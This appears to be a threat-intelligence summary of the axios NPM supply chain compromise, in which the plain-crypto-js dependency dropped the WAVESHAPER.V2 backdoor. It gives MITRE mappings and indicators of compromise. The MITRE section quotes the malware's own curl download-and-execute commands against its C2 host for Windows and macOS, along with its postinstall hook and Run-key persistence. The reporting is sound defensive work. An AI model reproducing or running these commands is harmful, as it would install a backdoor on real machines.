Google Threat Intelligence Group (GTIG) observed a supply chain compromise of the axios NPM package where a malicious dependency, plain-crypto-js (v4.2.1), delivered an obfuscated dropper (SILKBELL) that installed WAVESHAPER.V2 across Windows, macOS, and Linux. GTIG attributes the campaign to UNC1069, details OS-specific deployment and persistence mechanisms, and recommends immediate remediation including pinning axios versions, auditing for plain-crypto-js, blocking sfrclak[.]com/142.11.206.73, and rotating credentials. #WAVESHAPER.V2 #UNC1069
Keypoints
- An attacker compromised an axios maintainer account and introduced the malicious dependency plain-crypto-js into axios releases 1.14.1 and 0.30.4 during March 31, 2026.
- The plain-crypto-js package contains an obfuscated JavaScript dropper (SILKBELL / setup.js, SHA256: e10b1fa8…) that detects the host OS and deploys WAVESHAPER.V2 variants for Windows, macOS, and Linux.
- The dropper uses the NPM postinstall hook (“postinstall”: “node setup.js”) for silent background execution and attempts to remove traces by deleting itself and restoring package.json from package.md.
- Platform-specific payload delivery: Windows uses a copied wt.exe to run a PowerShell script, macOS downloads a Mach-O to /Library/Caches/com.apple.act.mond, and Linux receives a Python backdoor at /tmp/ld.py.
- WAVESHAPER.V2 is a multi-platform backdoor (C++/PowerShell/Python variants) that beacons to C2 on port 8000 with Base64-encoded JSON and supports commands like rundir, runscript, peinject, and kill.
- GTIG attributes the activity to UNC1069 based on WAVESHAPER lineage and infrastructure overlap (sfrclak[.]com resolving to 142.11.206.73 and connections through an AstrillVPN node), and urges immediate containment and supply-chain hardening.
MITRE Techniques
- [T1195 ] Supply Chain Compromise – The attacker introduced a malicious dependency into a legitimate NPM package, compromising the maintainer account and package releases. [‘an attacker introduced a malicious dependency named “plain-crypto-js” into axios NPM releases’]
- [T1059.007 ] Command and Scripting Interpreter: Node.js – The NPM postinstall hook executes a Node.js dropper (setup.js) to run the malicious deployment logic. [‘”postinstall”: “node setup.js”‘]
- [T1059.001 ] Command and Scripting Interpreter: PowerShell – Windows execution flow downloads and runs a PowerShell script via curl and a copied Windows Terminal to execute the payload. [‘objShell.Run “cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%6202033.ps1 … %PROGRAMDATA%wt.exe -w hidden -ep bypass -file %TEMP%6202033.ps1″‘]
- [T1059.004 ] Command and Scripting Interpreter: Unix Shell – macOS and Linux branches use curl and shell commands (bash/zsh) to download, chmod, and execute native binaries or scripts. [‘curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond && /bin/zsh -c “/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &”‘]
- [T1059.006 ] Command and Scripting Interpreter: Python – The Linux execution path downloads and executes a Python backdoor at /tmp/ld.py to provide RAT functionality. [‘The script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2.’]
- [T1105 ] Ingress Tool Transfer – The dropper retrieves platform-specific payloads and secondary components from attacker-controlled servers using HTTP POST and curl. [‘It then downloads a PowerShell script via curl … and saves it to the user’s AppData Temp directory’]
- [T1071.001 ] Application Layer Protocol: Web Protocols (HTTP) – WAVESHAPER.V2 beacons and C2 communications occur over HTTP on port 8000 using Base64-encoded JSON and a hard-coded User-Agent. [‘the malware beacons to the C2 endpoint over port 8000 at 60-second intervals’]
- [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Windows persistence is achieved by creating a hidden batch file and adding a MicrosoftUpdate Run key under HKCU to execute at logon. [‘creating a hidden batch file (%PROGRAMDATA%system.bat) and adding a new entry named MicrosoftUpdate to HKCU:SoftwareMicrosoftWindowsCurrentVersionRun’]
- [T1027 ] Obfuscated Files or Information – The dropper uses a custom XOR and Base64 obfuscation routine to hide C2 URLs and execution commands to evade static analysis. [‘The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands.’]
- [T1070.004 ] Indicator Removal on Host: File Deletion – The dropper attempts to remove downloaded scripts, delete itself, and restore the original package.json to hide forensic evidence. [‘After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook.’]
Indicators of Compromise
- [IP Address ] C2 and suspected infrastructure – 142.11.206.73 (WAVESHAPER.V2 C2), 23.254.167.216 (suspected UNC1069 infrastructure)
- [Domain ] C2 endpoints and download URLs – sfrclak[.]com, http://sfrclak[.]com:8000/6202033
- [File Hash ] Notable SHA256 samples for hunting and triage – e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 (SILKBELL setup.js), fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (WAVESHAPER.V2 Linux), and 5 more hashes
- [File Name / Path ] Malicious package and staged payload paths – plain-crypto-js-4.2.1.tgz, setup.js (dropper), /Library/Caches/com.apple.act.mond (macOS payload), /tmp/ld.py (Linux payload), system.bat (Windows persistence)